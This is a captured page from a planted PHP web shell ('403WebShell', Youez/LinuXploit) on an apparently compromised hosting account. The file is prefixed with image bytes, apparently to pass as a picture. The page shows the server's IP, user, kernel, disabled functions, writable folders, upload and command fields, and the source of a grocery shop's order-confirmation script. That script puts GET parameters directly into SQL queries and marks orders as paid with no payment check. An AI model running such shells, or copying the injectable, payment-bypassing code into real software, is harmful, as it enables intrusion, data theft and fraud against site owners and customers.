���� JFIF    aewtgwgerwasdasd403WebShell
403Webshell
Server IP : 147.93.80.58  /  Your IP : 216.73.216.195
Web Server : LiteSpeed
System : Linux id-dci-web1866.main-hosting.eu 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64
User : u939086737 ( 939086737)
PHP Version : 8.2.28
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u939086737/domains/jeevikagaumaa.in/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u939086737/domains/jeevikagaumaa.in/public_html//thankyou.php
<?php
session_start();
ini_set('display_errors', 1);
include './action/config.php';

if (isset($_GET['userid']) &&  isset($_GET["pay_id"])) {
    $userid = $_GET['userid'];
    $pay_id = $_GET["pay_id"];
    $address_id = $_GET['address_id'];
    $final_amount = $_GET['final_amount'];
    $shipping = $_GET['shipping_cost'];

    $address_query = mysqli_query($con, "SELECT * FROM `user_address` WHERE id='$address_id' AND userid='$userid' AND status=1");
    $address = mysqli_fetch_assoc($address_query);
    $name = $address['name'];
    $phone = $address['phone'];
    $address1 = $address['address'];
    $address2 = $address['landmark'];
    $city = $address['city'];
    $state = $address['state'];
    $pin = $address['pin'];

    $user_qry = mysqli_query($con, "SELECT * FROM users WHERE userid='$userid'");   //get userid
    $user_res = mysqli_fetch_array($user_qry);
    $sponcerid = $user_res['sponcerid'];
    $email = $user_res['email'];
    $txnid = rand();

    $date = date('Y-m-d H:i:s');
    $use_w_bal = isset($_SESSION['wallet_bal']) ? floatval($_SESSION['wallet_bal']) : 0;

    $invoice_no_qry = mysqli_query($con, "SELECT MAX(invoice_no) AS invoice_no FROM orders ");
    $invoice = mysqli_fetch_array($invoice_no_qry);
    $invoice_no = $invoice['invoice_no'] + 1;

    $q1 = mysqli_num_rows(mysqli_query($con, "SELECT * FROM `orders` WHERE txnid='$pay_id' "));
    if ($q1 > 0) {
    } else {
        
        if($use_w_bal>0){
            mysqli_query($con, "UPDATE `user_wallet` SET `wallet_bal` = wallet_bal-'$use_w_bal' WHERE userid='$userid' ");
            mysqli_query($con, "INSERT INTO `transaction`(`userid`, `tr_id`, `debit`, `tr_date`, `remark`) VALUES ('$userid','$txnid','$use_w_bal','$date','Wallet balance used for shopping') ");
        }

        $order_query = "INSERT INTO `orders`(`userid`, `name`, `email`, `phone`, `address1`, `address2`, `city`, `state`, `pin`, `order_type`, `order_date`, `grand_total`, `payment_status`, `order_status`, `txnid`, `od_st_date`, `use_w_bal`, `invoice_no`, `shipping`) 
        VALUES ('$userid', '$name', '$email', '$phone', '$address1', '$address2', '$city', '$state', '$pin', 'cash', '$date', '$final_amount', 'success', 'complete', '$pay_id', '$date', '$use_w_bal', '$invoice_no', '$shipping')";
        mysqli_query($con, $order_query);

        // Get the inserted order ID
        $order_id = mysqli_insert_id($con);
        $_SESSION['order_id'] = $order_id;

        $payment_query = "INSERT INTO `payment`(`userid`, `name`, `email`, `phone`, `amount`, `payment_status`, `txnid`, `added_on`, `purpose`) VALUES ('$userid', '$name', '$email', '$phone', '$final_amount', 'complete', '$pay_id', '$date', 'Shopping')";
        mysqli_query($con, $payment_query);

        //===================================Commission Goes to users ==============================================================
        $commission = ($final_amount - $shipping) * 0.05;
        $user_count = mysqli_num_rows(mysqli_query($con, "SELECT * FROM users WHERE sponcerid='$sponcerid'"));

        if ($user_count >= 3) {
            mysqli_query($con, "UPDATE `user_wallet` SET `wallet_bal` = wallet_bal+'$commission',`total_income` = total_income+'$commission' WHERE userid='$sponcerid' ");
            mysqli_query($con, "INSERT INTO `transaction`(`userid`, `tr_id`, `credit`, `tr_date`, `remark`) VALUES ('$sponcerid','$txnid','$commission','$date','Purchase Commission of $name') ");
            
            
            $lqry = mysqli_query($con, "SELECT * FROM `level_earning` WHERE userid='$sponcerid'");
            $lcount = mysqli_num_rows($lqry);
            if ($lcount == 0) {
                mysqli_query($con, "INSERT INTO `level_earning`(`userid`, `level`, `balance`) VALUES ('$sponcerid',0,0)");
            }
        }

        ?>
        <script>
            document.addEventListener('DOMContentLoaded', function() {
                function getCart() {
                    return JSON.parse(localStorage.getItem('cart')) || {};
                }

                function sendCartDataToServer() {
                    const cartData = getCart();
                    fetch('save_cart_data.php', {
                            method: 'POST',
                            headers: {
                                'Content-Type': 'application/json'
                            },
                            body: JSON.stringify(cartData)
                        })
                        .then(response => response.json())
                        .then(data => {
                            console.log('Success:', data);
                            // Clear localStorage after successful data transfer
                            localStorage.removeItem('cart');
                        })
                        .catch((error) => {
                            console.error('Error:', error);
                        });
                }
                sendCartDataToServer();
            });
        </script>
        <?php
        unset($_SESSION['wallet_bal']);
    }
}

?>
<!DOCTYPE html>
<html lang="en" data-bs-theme="light">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <meta name="description" content="Grocery  eCommerce">
    <meta name="author" content="ThemeTags">
    <meta name="keywords" content="Grocery  ecommerce, online shop, e-commerce,">
    <link rel="icon" href="assets/img/favicon.png" type="image/png" sizes="16x16">

    <title><?= $page . ' | ' . $shop['name'] ?></title>
    <link rel="stylesheet" href="assets/css/main.css">
</head>

<body>

    <!--main content wrapper start-->
    <div class="main-wrapper">
        <?php include './header.php'; ?>
        <!--login section start-->
        <section class="login-section">
            <div class="container">
                <div class="row justify-content-center">
                    <div class="col-lg-5 col-12 tt-login-img"><img src="./assets/img/thankyou.png" alt="Thankyou"></div>
                    <div class="col-lg-5 col-12 bg-white d-flex p-0 tt-login-col shadow">
                        <div class="text-center mt-10">
                            <h2>Your order has been placed <span class="text-primary">Successful</span></h2>
                            <p>Payment Id: <?= $pay_id ?></p>
                            <?php if($use_w_bal>0){ ?>
                            <p>Used Wallet Balance: ₹<?= $use_w_bal ?></p>
                            <?php } ?>
                            <p>Total: ₹<?= $final_amount ?></p>
                            <p><a class="btn btn-secondary" href="./shop?p=1">Continue Shopping</a></p>
                        </div>
                    </div>
                </div>
            </div>
        </section>
        <!--login section end-->

        <?php include './footer.php'; ?>
        
        <script>
            $(document).ready(function() {
                var orderId = "<?php echo $_SESSION['order_id']; ?>"; // Use the session order ID from PHP
                var userId = "<?php echo $userid; ?>"; // Use the user ID from PHP
            
                // Make AJAX call to calculate and apply cashback on first load
                $.ajax({
                    url: "apply_cashback.php", // PHP file to handle cashback logic
                    type: "POST",
                    data: {
                        userid: userId,
                        order_id: orderId
                    },
                    success: function(response) {
                        console.log("Cashback applied: " + response);
                    },
                    error: function(xhr, status, error) {
                        console.error("An error occurred: " + error);
                    }
                });
            });
            

        </script>


</body>

</html>

Youez - 2016 - github.com/yon3zu
LinuXploit